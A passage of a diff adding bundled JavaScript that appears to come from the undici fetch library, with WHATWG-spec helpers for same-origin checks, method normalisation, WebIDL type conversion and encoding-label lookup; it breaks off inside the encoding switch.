+/** + * @link {https://html.spec.whatwg.org/multipage/origin.html#same-origin} + * @param {URL} A + * @param {URL} B + */ +function sameOrigin (A, B) { + // 1. If A and B are the same opaque origin, then return true. + if (A.origin === B.origin && A.origin === 'null') { + return true + } + + // 2. If A and B are both tuple origins and their schemes, + // hosts, and port are identical, then return true. + if (A.protocol === B.protocol && A.hostname === B.hostname && A.port === B.port) { + return true + } + + // 3. Return false. + return false +} + +function createDeferredPromise () { + let res + let rej + const promise = new Promise((resolve, reject) => { + res = resolve + rej = reject + }) + + return { promise, resolve: res, reject: rej } +} + +function isAborted (fetchParams) { + return fetchParams.controller.state === 'aborted' +} + +function isCancelled (fetchParams) { + return fetchParams.controller.state === 'aborted' || + fetchParams.controller.state === 'terminated' +} + +const normalizeMethodRecord = { + delete: 'DELETE', + DELETE: 'DELETE', + get: 'GET', + GET: 'GET', + head: 'HEAD', + HEAD: 'HEAD', + options: 'OPTIONS', + OPTIONS: 'OPTIONS', + post: 'POST', + POST: 'POST', + put: 'PUT', + PUT: 'PUT' +} + +// Note: object prototypes should not be able to be referenced. e.g. `Object#hasOwnProperty`. +Object.setPrototypeOf(normalizeMethodRecord, null) + +/** + * @see https://fetch.spec.whatwg.org/#concept-method-normalize + * @param {string} method + */ +function normalizeMethod (method) { + return normalizeMethodRecord[method.toLowerCase()] ?? method +} + +// https://infra.spec.whatwg.org/#serialize-a-javascript-value-to-a-json-string +function serializeJavascriptValueToJSONString (value) { + // 1. Let result be ? Call(%JSON.stringify%, undefined, « value »). + const result = JSON.stringify(value) + + // 2. If result is undefined, then throw a TypeError. + if (result === undefined) { + throw new TypeError('Value is not JSON serializable') + } + + // 3. Assert: result is a string. + assert(typeof result === 'string') + + // 4. Return result. + return result +} + +// https://tc39.es/ecma262/#sec-%25iteratorprototype%25-object +const esIteratorPrototype = Object.getPrototypeOf(Object.getPrototypeOf([][Symbol.iterator]())) + +/** + * @see https://webidl.spec.whatwg.org/#dfn-iterator-prototype-object + * @param {() => unknown[]} iterator + * @param {string} name name of the instance + * @param {'key'|'value'|'key+value'} kind + */ +function makeIterator (iterator, name, kind) { + const object = { + index: 0, + kind, + target: iterator + } + + const i = { + next () { + // 1. Let interface be the interface for which the iterator prototype object exists. + + // 2. Let thisValue be the this value. + + // 3. Let object be ? ToObject(thisValue). + + // 4. If object is a platform object, then perform a security + // check, passing: + + // 5. If object is not a default iterator object for interface, + // then throw a TypeError. + if (Object.getPrototypeOf(this) !== i) { + throw new TypeError( + `'next' called on an object that does not implement interface ${name} Iterator.` + ) + } + + // 6. Let index be object’s index. + // 7. Let kind be object’s kind. + // 8. Let values be object’s target's value pairs to iterate over. + const { index, kind, target } = object + const values = target() + + // 9. Let len be the length of values. + const len = values.length + + // 10. If index is greater than or equal to len, then return + // CreateIterResultObject(undefined, true). + if (index >= len) { + return { value: undefined, done: true } + } + + // 11. Let pair be the entry in values at index index. + const pair = values[index] + + // 12. Set object’s index to index + 1. + object.index = index + 1 + + // 13. Return the iterator result for pair and kind. + return iteratorResult(pair, kind) + }, + // The class string of an iterator prototype object for a given interface is the + // result of concatenating the identifier of the interface and the string " Iterator". + [Symbol.toStringTag]: `${name} Iterator` + } + + // The [[Prototype]] internal slot of an iterator prototype object must be %IteratorPrototype%. + Object.setPrototypeOf(i, esIteratorPrototype) + // esIteratorPrototype needs to be the prototype of i + // which is the prototype of an empty object. Yes, it's confusing. + return Object.setPrototypeOf({}, i) +} + +// https://webidl.spec.whatwg.org/#iterator-result +function iteratorResult (pair, kind) { + let result + + // 1. Let result be a value determined by the value of kind: + switch (kind) { + case 'key': { + // 1. Let idlKey be pair’s key. + // 2. Let key be the result of converting idlKey to an + // ECMAScript value. + // 3. result is key. + result = pair[0] + break + } + case 'value': { + // 1. Let idlValue be pair’s value. + // 2. Let value be the result of converting idlValue to + // an ECMAScript value. + // 3. result is value. + result = pair[1] + break + } + case 'key+value': { + // 1. Let idlKey be pair’s key. + // 2. Let idlValue be pair’s value. + // 3. Let key be the result of converting idlKey to an + // ECMAScript value. + // 4. Let value be the result of converting idlValue to + // an ECMAScript value. + // 5. Let array be ! ArrayCreate(2). + // 6. Call ! CreateDataProperty(array, "0", key). + // 7. Call ! CreateDataProperty(array, "1", value). + // 8. result is array. + result = pair + break + } + } + + // 2. Return CreateIterResultObject(result, false). + return { value: result, done: false } +} + +/** + * @see https://fetch.spec.whatwg.org/#body-fully-read + */ +async function fullyReadBody (body, processBody, processBodyError) { + // 1. If taskDestination is null, then set taskDestination to + // the result of starting a new parallel queue. + + // 2. Let successSteps given a byte sequence bytes be to queue a + // fetch task to run processBody given bytes, with taskDestination. + const successSteps = processBody + + // 3. Let errorSteps be to queue a fetch task to run processBodyError, + // with taskDestination. + const errorSteps = processBodyError + + // 4. Let reader be the result of getting a reader for body’s stream. + // If that threw an exception, then run errorSteps with that + // exception and return. + let reader + + try { + reader = body.stream.getReader() + } catch (e) { + errorSteps(e) + return + } + + // 5. Read all bytes from reader, given successSteps and errorSteps. + try { + const result = await readAllBytes(reader) + successSteps(result) + } catch (e) { + errorSteps(e) + } +} + +/** @type {ReadableStream} */ +let ReadableStream = globalThis.ReadableStream + +function isReadableStreamLike (stream) { + if (!ReadableStream) { + ReadableStream = (__nccwpck_require__(5356).ReadableStream) + } + + return stream instanceof ReadableStream || ( + stream[Symbol.toStringTag] === 'ReadableStream' && + typeof stream.tee === 'function' + ) +} + +const MAXIMUM_ARGUMENT_LENGTH = 65535 + +/** + * @see https://infra.spec.whatwg.org/#isomorphic-decode + * @param {number[]|Uint8Array} input + */ +function isomorphicDecode (input) { + // 1. To isomorphic decode a byte sequence input, return a string whose code point + // length is equal to input’s length and whose code points have the same values + // as the values of input’s bytes, in the same order. + + if (input.length < MAXIMUM_ARGUMENT_LENGTH) { + return String.fromCharCode(...input) + } + + return input.reduce((previous, current) => previous + String.fromCharCode(current), '') +} + +/** + * @param {ReadableStreamController} controller + */ +function readableStreamClose (controller) { + try { + controller.close() + } catch (err) { + // TODO: add comment explaining why this error occurs. + if (!err.message.includes('Controller is already closed')) { + throw err + } + } +} + +/** + * @see https://infra.spec.whatwg.org/#isomorphic-encode + * @param {string} input + */ +function isomorphicEncode (input) { + // 1. Assert: input contains no code points greater than U+00FF. + for (let i = 0; i < input.length; i++) { + assert(input.charCodeAt(i) <= 0xFF) + } + + // 2. Return a byte sequence whose length is equal to input’s code + // point length and whose bytes have the same values as the + // values of input’s code points, in the same order + return input +} + +/** + * @see https://streams.spec.whatwg.org/#readablestreamdefaultreader-read-all-bytes + * @see https://streams.spec.whatwg.org/#read-loop + * @param {ReadableStreamDefaultReader} reader + */ +async function readAllBytes (reader) { + const bytes = [] + let byteLength = 0 + + while (true) { + const { done, value: chunk } = await reader.read() + + if (done) { + // 1. Call successSteps with bytes. + return Buffer.concat(bytes, byteLength) + } + + // 1. If chunk is not a Uint8Array object, call failureSteps + // with a TypeError and abort these steps. + if (!isUint8Array(chunk)) { + throw new TypeError('Received non-Uint8Array chunk') + } + + // 2. Append the bytes represented by chunk to bytes. + bytes.push(chunk) + byteLength += chunk.length + + // 3. Read-loop given reader, bytes, successSteps, and failureSteps. + } +} + +/** + * @see https://fetch.spec.whatwg.org/#is-local + * @param {URL} url + */ +function urlIsLocal (url) { + assert('protocol' in url) // ensure it's a url object + + const protocol = url.protocol + + return protocol === 'about:' || protocol === 'blob:' || protocol === 'data:' +} + +/** + * @param {string|URL} url + */ +function urlHasHttpsScheme (url) { + if (typeof url === 'string') { + return url.startsWith('https:') + } + + return url.protocol === 'https:' +} + +/** + * @see https://fetch.spec.whatwg.org/#http-scheme + * @param {URL} url + */ +function urlIsHttpHttpsScheme (url) { + assert('protocol' in url) // ensure it's a url object + + const protocol = url.protocol + + return protocol === 'http:' || protocol === 'https:' +} + +/** + * Fetch supports node >= 16.8.0, but Object.hasOwn was added in v16.9.0. + */ +const hasOwn = Object.hasOwn || ((dict, key) => Object.prototype.hasOwnProperty.call(dict, key)) + +module.exports = { + isAborted, + isCancelled, + createDeferredPromise, + ReadableStreamFrom, + toUSVString, + tryUpgradeRequestToAPotentiallyTrustworthyURL, + coarsenedSharedCurrentTime, + determineRequestsReferrer, + makePolicyContainer, + clonePolicyContainer, + appendFetchMetadata, + appendRequestOriginHeader, + TAOCheck, + corsCheck, + crossOriginResourcePolicyCheck, + createOpaqueTimingInfo, + setRequestReferrerPolicyOnRedirect, + isValidHTTPToken, + requestBadPort, + requestCurrentURL, + responseURL, + responseLocationURL, + isBlobLike, + isURLPotentiallyTrustworthy, + isValidReasonPhrase, + sameOrigin, + normalizeMethod, + serializeJavascriptValueToJSONString, + makeIterator, + isValidHeaderName, + isValidHeaderValue, + hasOwn, + isErrorLike, + fullyReadBody, + bytesMatch, + isReadableStreamLike, + readableStreamClose, + isomorphicEncode, + isomorphicDecode, + urlIsLocal, + urlHasHttpsScheme, + urlIsHttpHttpsScheme, + readAllBytes, + normalizeMethodRecord +} + + +/***/ }), + +/***/ 1744: +/***/ ((module, __unused_webpack_exports, __nccwpck_require__) => { + +"use strict"; + + +const { types } = __nccwpck_require__(3837) +const { hasOwn, toUSVString } = __nccwpck_require__(2538) + +/** @type {import('../../types/webidl').Webidl} */ +const webidl = {} +webidl.converters = {} +webidl.util = {} +webidl.errors = {} + +webidl.errors.exception = function (message) { + return new TypeError(`${message.header}: ${message.message}`) +} + +webidl.errors.conversionFailed = function (context) { + const plural = context.types.length === 1 ? '' : ' one of' + const message = + `${context.argument} could not be converted to` + + `${plural}: ${context.types.join(', ')}.` + + return webidl.errors.exception({ + header: context.prefix, + message + }) +} + +webidl.errors.invalidArgument = function (context) { + return webidl.errors.exception({ + header: context.prefix, + message: `"${context.value}" is an invalid ${context.type}.` + }) +} + +// https://webidl.spec.whatwg.org/#implements +webidl.brandCheck = function (V, I, opts = undefined) { + if (opts?.strict !== false && !(V instanceof I)) { + throw new TypeError('Illegal invocation') + } else { + return V?.[Symbol.toStringTag] === I.prototype[Symbol.toStringTag] + } +} + +webidl.argumentLengthCheck = function ({ length }, min, ctx) { + if (length < min) { + throw webidl.errors.exception({ + message: `${min} argument${min !== 1 ? 's' : ''} required, ` + + `but${length ? ' only' : ''} ${length} found.`, + ...ctx + }) + } +} + +webidl.illegalConstructor = function () { + throw webidl.errors.exception({ + header: 'TypeError', + message: 'Illegal constructor' + }) +} + +// https://tc39.es/ecma262/#sec-ecmascript-data-types-and-values +webidl.util.Type = function (V) { + switch (typeof V) { + case 'undefined': return 'Undefined' + case 'boolean': return 'Boolean' + case 'string': return 'String' + case 'symbol': return 'Symbol' + case 'number': return 'Number' + case 'bigint': return 'BigInt' + case 'function': + case 'object': { + if (V === null) { + return 'Null' + } + + return 'Object' + } + } +} + +// https://webidl.spec.whatwg.org/#abstract-opdef-converttoint +webidl.util.ConvertToInt = function (V, bitLength, signedness, opts = {}) { + let upperBound + let lowerBound + + // 1. If bitLength is 64, then: + if (bitLength === 64) { + // 1. Let upperBound be 2^53 − 1. + upperBound = Math.pow(2, 53) - 1 + + // 2. If signedness is "unsigned", then let lowerBound be 0. + if (signedness === 'unsigned') { + lowerBound = 0 + } else { + // 3. Otherwise let lowerBound be −2^53 + 1. + lowerBound = Math.pow(-2, 53) + 1 + } + } else if (signedness === 'unsigned') { + // 2. Otherwise, if signedness is "unsigned", then: + + // 1. Let lowerBound be 0. + lowerBound = 0 + + // 2. Let upperBound be 2^bitLength − 1. + upperBound = Math.pow(2, bitLength) - 1 + } else { + // 3. Otherwise: + + // 1. Let lowerBound be -2^bitLength − 1. + lowerBound = Math.pow(-2, bitLength) - 1 + + // 2. Let upperBound be 2^bitLength − 1 − 1. + upperBound = Math.pow(2, bitLength - 1) - 1 + } + + // 4. Let x be ? ToNumber(V). + let x = Number(V) + + // 5. If x is −0, then set x to +0. + if (x === 0) { + x = 0 + } + + // 6. If the conversion is to an IDL type associated + // with the [EnforceRange] extended attribute, then: + if (opts.enforceRange === true) { + // 1. If x is NaN, +∞, or −∞, then throw a TypeError. + if ( + Number.isNaN(x) || + x === Number.POSITIVE_INFINITY || + x === Number.NEGATIVE_INFINITY + ) { + throw webidl.errors.exception({ + header: 'Integer conversion', + message: `Could not convert ${V} to an integer.` + }) + } + + // 2. Set x to IntegerPart(x). + x = webidl.util.IntegerPart(x) + + // 3. If x < lowerBound or x > upperBound, then + // throw a TypeError. + if (x < lowerBound || x > upperBound) { + throw webidl.errors.exception({ + header: 'Integer conversion', + message: `Value must be between ${lowerBound}-${upperBound}, got ${x}.` + }) + } + + // 4. Return x. + return x + } + + // 7. If x is not NaN and the conversion is to an IDL + // type associated with the [Clamp] extended + // attribute, then: + if (!Number.isNaN(x) && opts.clamp === true) { + // 1. Set x to min(max(x, lowerBound), upperBound). + x = Math.min(Math.max(x, lowerBound), upperBound) + + // 2. Round x to the nearest integer, choosing the + // even integer if it lies halfway between two, + // and choosing +0 rather than −0. + if (Math.floor(x) % 2 === 0) { + x = Math.floor(x) + } else { + x = Math.ceil(x) + } + + // 3. Return x. + return x + } + + // 8. If x is NaN, +0, +∞, or −∞, then return +0. + if ( + Number.isNaN(x) || + (x === 0 && Object.is(0, x)) || + x === Number.POSITIVE_INFINITY || + x === Number.NEGATIVE_INFINITY + ) { + return 0 + } + + // 9. Set x to IntegerPart(x). + x = webidl.util.IntegerPart(x) + + // 10. Set x to x modulo 2^bitLength. + x = x % Math.pow(2, bitLength) + + // 11. If signedness is "signed" and x ≥ 2^bitLength − 1, + // then return x − 2^bitLength. + if (signedness === 'signed' && x >= Math.pow(2, bitLength) - 1) { + return x - Math.pow(2, bitLength) + } + + // 12. Otherwise, return x. + return x +} + +// https://webidl.spec.whatwg.org/#abstract-opdef-integerpart +webidl.util.IntegerPart = function (n) { + // 1. Let r be floor(abs(n)). + const r = Math.floor(Math.abs(n)) + + // 2. If n < 0, then return -1 × r. + if (n < 0) { + return -1 * r + } + + // 3. Otherwise, return r. + return r +} + +// https://webidl.spec.whatwg.org/#es-sequence +webidl.sequenceConverter = function (converter) { + return (V) => { + // 1. If Type(V) is not Object, throw a TypeError. + if (webidl.util.Type(V) !== 'Object') { + throw webidl.errors.exception({ + header: 'Sequence', + message: `Value of type ${webidl.util.Type(V)} is not an Object.` + }) + } + + // 2. Let method be ? GetMethod(V, @@iterator). + /** @type {Generator} */ + const method = V?.[Symbol.iterator]?.() + const seq = [] + + // 3. If method is undefined, throw a TypeError. + if ( + method === undefined || + typeof method.next !== 'function' + ) { + throw webidl.errors.exception({ + header: 'Sequence', + message: 'Object is not an iterator.' + }) + } + + // https://webidl.spec.whatwg.org/#create-sequence-from-iterable + while (true) { + const { done, value } = method.next() + + if (done) { + break + } + + seq.push(converter(value)) + } + + return seq + } +} + +// https://webidl.spec.whatwg.org/#es-to-record +webidl.recordConverter = function (keyConverter, valueConverter) { + return (O) => { + // 1. If Type(O) is not Object, throw a TypeError. + if (webidl.util.Type(O) !== 'Object') { + throw webidl.errors.exception({ + header: 'Record', + message: `Value of type ${webidl.util.Type(O)} is not an Object.` + }) + } + + // 2. Let result be a new empty instance of record. + const result = {} + + if (!types.isProxy(O)) { + // Object.keys only returns enumerable properties + const keys = Object.keys(O) + + for (const key of keys) { + // 1. Let typedKey be key converted to an IDL value of type K. + const typedKey = keyConverter(key) + + // 2. Let value be ? Get(O, key). + // 3. Let typedValue be value converted to an IDL value of type V. + const typedValue = valueConverter(O[key]) + + // 4. Set result[typedKey] to typedValue. + result[typedKey] = typedValue + } + + // 5. Return result. + return result + } + + // 3. Let keys be ? O.[[OwnPropertyKeys]](). + const keys = Reflect.ownKeys(O) + + // 4. For each key of keys. + for (const key of keys) { + // 1. Let desc be ? O.[[GetOwnProperty]](key). + const desc = Reflect.getOwnPropertyDescriptor(O, key) + + // 2. If desc is not undefined and desc.[[Enumerable]] is true: + if (desc?.enumerable) { + // 1. Let typedKey be key converted to an IDL value of type K. + const typedKey = keyConverter(key) + + // 2. Let value be ? Get(O, key). + // 3. Let typedValue be value converted to an IDL value of type V. + const typedValue = valueConverter(O[key]) + + // 4. Set result[typedKey] to typedValue. + result[typedKey] = typedValue + } + } + + // 5. Return result. + return result + } +} + +webidl.interfaceConverter = function (i) { + return (V, opts = {}) => { + if (opts.strict !== false && !(V instanceof i)) { + throw webidl.errors.exception({ + header: i.name, + message: `Expected ${V} to be an instance of ${i.name}.` + }) + } + + return V + } +} + +webidl.dictionaryConverter = function (converters) { + return (dictionary) => { + const type = webidl.util.Type(dictionary) + const dict = {} + + if (type === 'Null' || type === 'Undefined') { + return dict + } else if (type !== 'Object') { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `Expected ${dictionary} to be one of: Null, Undefined, Object.` + }) + } + + for (const options of converters) { + const { key, defaultValue, required, converter } = options + + if (required === true) { + if (!hasOwn(dictionary, key)) { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `Missing required key "${key}".` + }) + } + } + + let value = dictionary[key] + const hasDefault = hasOwn(options, 'defaultValue') + + // Only use defaultValue if value is undefined and + // a defaultValue options was provided. + if (hasDefault && value !== null) { + value = value ?? defaultValue + } + + // A key can be optional and have no default value. + // When this happens, do not perform a conversion, + // and do not assign the key a value. + if (required || hasDefault || value !== undefined) { + value = converter(value) + + if ( + options.allowedValues && + !options.allowedValues.includes(value) + ) { + throw webidl.errors.exception({ + header: 'Dictionary', + message: `${value} is not an accepted type. Expected one of ${options.allowedValues.join(', ')}.` + }) + } + + dict[key] = value + } + } + + return dict + } +} + +webidl.nullableConverter = function (converter) { + return (V) => { + if (V === null) { + return V + } + + return converter(V) + } +} + +// https://webidl.spec.whatwg.org/#es-DOMString +webidl.converters.DOMString = function (V, opts = {}) { + // 1. If V is null and the conversion is to an IDL type + // associated with the [LegacyNullToEmptyString] + // extended attribute, then return the DOMString value + // that represents the empty string. + if (V === null && opts.legacyNullToEmptyString) { + return '' + } + + // 2. Let x be ? ToString(V). + if (typeof V === 'symbol') { + throw new TypeError('Could not convert argument of type symbol to string.') + } + + // 3. Return the IDL DOMString value that represents the + // same sequence of code units as the one the + // ECMAScript String value x represents. + return String(V) +} + +// https://webidl.spec.whatwg.org/#es-ByteString +webidl.converters.ByteString = function (V) { + // 1. Let x be ? ToString(V). + // Note: DOMString converter perform ? ToString(V) + const x = webidl.converters.DOMString(V) + + // 2. If the value of any element of x is greater than + // 255, then throw a TypeError. + for (let index = 0; index < x.length; index++) { + if (x.charCodeAt(index) > 255) { + throw new TypeError( + 'Cannot convert argument to a ByteString because the character at ' + + `index ${index} has a value of ${x.charCodeAt(index)} which is greater than 255.` + ) + } + } + + // 3. Return an IDL ByteString value whose length is the + // length of x, and where the value of each element is + // the value of the corresponding element of x. + return x +} + +// https://webidl.spec.whatwg.org/#es-USVString +webidl.converters.USVString = toUSVString + +// https://webidl.spec.whatwg.org/#es-boolean +webidl.converters.boolean = function (V) { + // 1. Let x be the result of computing ToBoolean(V). + const x = Boolean(V) + + // 2. Return the IDL boolean value that is the one that represents + // the same truth value as the ECMAScript Boolean value x. + return x +} + +// https://webidl.spec.whatwg.org/#es-any +webidl.converters.any = function (V) { + return V +} + +// https://webidl.spec.whatwg.org/#es-long-long +webidl.converters['long long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 64, "signed"). + const x = webidl.util.ConvertToInt(V, 64, 'signed') + + // 2. Return the IDL long long value that represents + // the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-long-long +webidl.converters['unsigned long long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 64, "unsigned"). + const x = webidl.util.ConvertToInt(V, 64, 'unsigned') + + // 2. Return the IDL unsigned long long value that + // represents the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-long +webidl.converters['unsigned long'] = function (V) { + // 1. Let x be ? ConvertToInt(V, 32, "unsigned"). + const x = webidl.util.ConvertToInt(V, 32, 'unsigned') + + // 2. Return the IDL unsigned long value that + // represents the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#es-unsigned-short +webidl.converters['unsigned short'] = function (V, opts) { + // 1. Let x be ? ConvertToInt(V, 16, "unsigned"). + const x = webidl.util.ConvertToInt(V, 16, 'unsigned', opts) + + // 2. Return the IDL unsigned short value that represents + // the same numeric value as x. + return x +} + +// https://webidl.spec.whatwg.org/#idl-ArrayBuffer +webidl.converters.ArrayBuffer = function (V, opts = {}) { + // 1. If Type(V) is not Object, or V does not have an + // [[ArrayBufferData]] internal slot, then throw a + // TypeError. + // see: https://tc39.es/ecma262/#sec-properties-of-the-arraybuffer-instances + // see: https://tc39.es/ecma262/#sec-properties-of-the-sharedarraybuffer-instances + if ( + webidl.util.Type(V) !== 'Object' || + !types.isAnyArrayBuffer(V) + ) { + throw webidl.errors.conversionFailed({ + prefix: `${V}`, + argument: `${V}`, + types: ['ArrayBuffer'] + }) + } + + // 2. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V) is true, then throw a + // TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V) is true, then throw a + // TypeError. + // Note: resizable ArrayBuffers are currently a proposal. + + // 4. Return the IDL ArrayBuffer value that is a + // reference to the same object as V. + return V +} + +webidl.converters.TypedArray = function (V, T, opts = {}) { + // 1. Let T be the IDL type V is being converted to. + + // 2. If Type(V) is not Object, or V does not have a + // [[TypedArrayName]] internal slot with a value + // equal to T’s name, then throw a TypeError. + if ( + webidl.util.Type(V) !== 'Object' || + !types.isTypedArray(V) || + V.constructor.name !== T.name + ) { + throw webidl.errors.conversionFailed({ + prefix: `${T.name}`, + argument: `${V}`, + types: [T.name] + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 4. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + // Note: resizable array buffers are currently a proposal + + // 5. Return the IDL value of type T that is a reference + // to the same object as V. + return V +} + +webidl.converters.DataView = function (V, opts = {}) { + // 1. If Type(V) is not Object, or V does not have a + // [[DataView]] internal slot, then throw a TypeError. + if (webidl.util.Type(V) !== 'Object' || !types.isDataView(V)) { + throw webidl.errors.exception({ + header: 'DataView', + message: 'Object is not a DataView.' + }) + } + + // 2. If the conversion is not to an IDL type associated + // with the [AllowShared] extended attribute, and + // IsSharedArrayBuffer(V.[[ViewedArrayBuffer]]) is true, + // then throw a TypeError. + if (opts.allowShared === false && types.isSharedArrayBuffer(V.buffer)) { + throw webidl.errors.exception({ + header: 'ArrayBuffer', + message: 'SharedArrayBuffer is not allowed.' + }) + } + + // 3. If the conversion is not to an IDL type associated + // with the [AllowResizable] extended attribute, and + // IsResizableArrayBuffer(V.[[ViewedArrayBuffer]]) is + // true, then throw a TypeError. + // Note: resizable ArrayBuffers are currently a proposal + + // 4. Return the IDL DataView value that is a reference + // to the same object as V. + return V +} + +// https://webidl.spec.whatwg.org/#BufferSource +webidl.converters.BufferSource = function (V, opts = {}) { + if (types.isAnyArrayBuffer(V)) { + return webidl.converters.ArrayBuffer(V, opts) + } + + if (types.isTypedArray(V)) { + return webidl.converters.TypedArray(V, V.constructor) + } + + if (types.isDataView(V)) { + return webidl.converters.DataView(V, opts) + } + + throw new TypeError(`Could not convert ${V} to a BufferSource.`) +} + +webidl.converters['sequence'] = webidl.sequenceConverter( + webidl.converters.ByteString +) + +webidl.converters['sequence>'] = webidl.sequenceConverter( + webidl.converters['sequence'] +) + +webidl.converters['record'] = webidl.recordConverter( + webidl.converters.ByteString, + webidl.converters.ByteString +) + +module.exports = { + webidl +} + + +/***/ }), + +/***/ 4854: +/***/ ((module) => { + +"use strict"; + + +/** + * @see https://encoding.spec.whatwg.org/#concept-encoding-get + * @param {string|undefined} label + */ +function getEncoding (label) { + if (!label) { + return 'failure' + } + + // 1. Remove any leading and trailing ASCII whitespace from label. + // 2. If label is an ASCII case-insensitive match for any of the + // labels listed in the table below, then return the + // corresponding encoding; otherwise return failure. + switch (label.trim().toLowerCase()) { + case 'unicode-1-1-utf-8': + case 'unicode11utf8': + case 'unicode20utf8': + case 'utf-8': + case 'utf8': + case 'x-unicode20utf8': + return 'UTF-8' + case '866': + case 'cp866': + case 'csibm866': + case 'ibm866': + return 'IBM866' + case 'csisolatin2': + case 'iso-8859-2': + case 'iso-ir-101': + case 'iso8859-2': + case 'iso88592': + case 'iso_8859-2': + case 'iso_8859-2:1987': + case 'l2': + case 'latin2': + return 'ISO-8859-2' + case 'csisolatin3': + case 'iso-8859-3': + case 'iso-ir-109': + case 'iso8859-3': + case 'iso88593': + case 'iso_8859-3': + case 'iso_8859-3:1988': + case 'l3': + case 'latin3': + return 'ISO-8859-3' + case 'csisolatin4': + case 'iso-8859-4': + case 'iso-ir-110': + case 'iso8859-4': + case 'iso88594': + case 'iso_8859-4': + case 'iso_8859-4:1988': + case 'l4': + case 'latin4': + return 'ISO-8859-4' + case 'csisolatincyrillic': + case 'cyrillic': + case 'iso-8859-5': + case 'iso-ir-144': + case 'iso8859-5': + case 'iso88595': + case 'iso_8859-5': + case 'iso_8859-5:1988': + return 'ISO-8859-5' + case 'arabic': + case 'asmo-708': + case 'csiso88596e': + case 'csiso88596i': + case 'csisolatinarabic': + case 'ecma-114': + case 'iso-8859-6': + case 'iso-8859-6-e': + case 'iso-8859-6-i': + case 'iso-ir-127': + case 'iso8859-6': + case 'iso88596': + case 'iso_8859-6': + case 'iso_8859-6:1987': + return 'ISO-8859-6' + case 'csisolatingreek': + case 'ecma-118': + case 'elot_928': + case 'greek': + case 'greek8': + case 'iso-8859-7': + case 'iso-ir-126': + case 'iso8859-7': + case 'iso88597': + case 'iso_8859-7': + case 'iso_8859-7:1987': + case 'sun_eu_greek': + return 'ISO-8859-7' + case 'csiso88598e': + case 'csisolatinhebrew': + case 'hebrew': + case 'iso-8859-8': + case 'iso-8859-8-e': + case 'iso-ir-138': + case 'iso8859-8': + case 'iso88598': + case 'iso_8859-8': + case 'iso_8859-8:1988': + case 'visual': + return 'ISO-8859-8' + case 'csiso88598i': + case 'iso-8859-8-i': + case 'logical': + return 'ISO-8859-8-I' + case 'csisolatin6': + case 'iso-8859-10': + case 'iso-ir-157': + case 'iso8859-10': + case 'iso885910': + case 'l6': + case 'latin6': + return 'ISO-8859-10' + case 'iso-8859-13': + case 'iso8859-13': + case 'iso885913': + return 'ISO-8859-13' + case 'iso-8859-14': + case 'iso8859-14': + case 'iso885914': + return 'ISO-8859-14' + case 'csisolatin9': + case 'iso-8859-15': + case 'iso8859-15': + case 'iso885915': + case 'iso_8859-15': + case 'l9': + return 'ISO-8859-15' + case 'iso-8859-16': + return 'ISO-8859-16' + case 'cskoi8r': + case 'koi': + case 'koi8': + case 'koi8-r': + case 'koi8_r': + return 'KOI8-R' + case 'koi8-ru': + case 'koi8-u': + return 'KOI8-U' + case 'csmacintosh': + case 'mac': + case 'macintosh': + case 'x-mac-roman': + return 'macintosh' + case 'iso-8859-11': + case 'iso8859-11': + case 'iso885911': + case 'tis-620': + case 'windows-874': + return 'windows-874' + case 'cp1250': + case 'windows-1250': + case 'x-cp1250': + return 'windows-1250' + case 'cp1251': + case 'windows-1251': + case 'x-cp1251': + return 'windows-1251' + case 'ansi_x3.4-1968': + case 'ascii': + case 'cp1252': + case 'cp819': + case 'csisolatin1': + case 'ibm819': + case 'iso-8859-1': + case 'iso-ir-100': + case 'iso8859-1': + case 'iso88591': + case 'iso_8859-1': + case 'iso_8859-1:1987': + case 'l1': + case 'latin1': + case 'us-ascii': + case 'windows-1252': + case 'x-cp1252': + return 'windows-1252' + case 'cp1253': + case 'windows-1253': + case 'x-cp1253': + return 'windows-1253' + case 'cp1254': + case 'csisolatin5': + case 'iso-8859-9': + case 'iso-ir-148': + case 'iso8859-9': + case 'iso88599': + case 'iso_8859-9': + case 'iso_8859-9:1989': + case 'l5': + case 'latin5': + case 'windows-1254': + case 'x-cp1254': + return 'windows-1254' + case 'cp1255': + case 'windows-1255': + case 'x-cp1255': + return 'windows-1255' + case 'cp1256': + case 'windows-1256': + case 'x-cp1256': + return 'windows-1256' + case 'cp1257': + case 'windows-1257': + case 'x-cp1257': + return 'windows-1257' + case 'cp1258': + case 'windows-1258': + case 'x-cp1258': + return 'windows-1258' + case 'x-mac-cyrillic': + case 'x-mac-ukrainian': + return 'x-mac-cyrillic' + case 'chinese': + case 'csgb2312': + case 'csiso58gb231280': + case 'gb2312': + case 'gb_2312': + case 'gb_2312-80': + case 'gbk': + case 'iso-ir-58': + case 'x-gbk': + return 'GBK' + case 'gb18030': + return 'gb18030' + case 'big5': + case 'big5-hkscs': + case 'cn-big5': + case 'csbig5': + case 'x-x-big5': + return 'Big5' + case 'cseucpkdfmtjapanese': + case 'euc-jp': + case 'x-euc-jp': + return 'EUC-JP' + case 'csiso2022jp': + case 'iso-2022-jp': + return 'ISO-2022-JP' + case 'csshiftjis': + case 'ms932': + case 'ms_kanji': + case 'shift-jis': + case 'shift_jis': + case 'sjis': + case 'windows-31j': + case 'x-sjis': + return 'Shift_JIS' + case 'cseuckr': + case 'csksc56011987': + case 'euc-kr': + case 'iso-ir-149': + case 'korean': + case 'ks_c_5601-1987': + case 'ks_c_5601-1989': + case 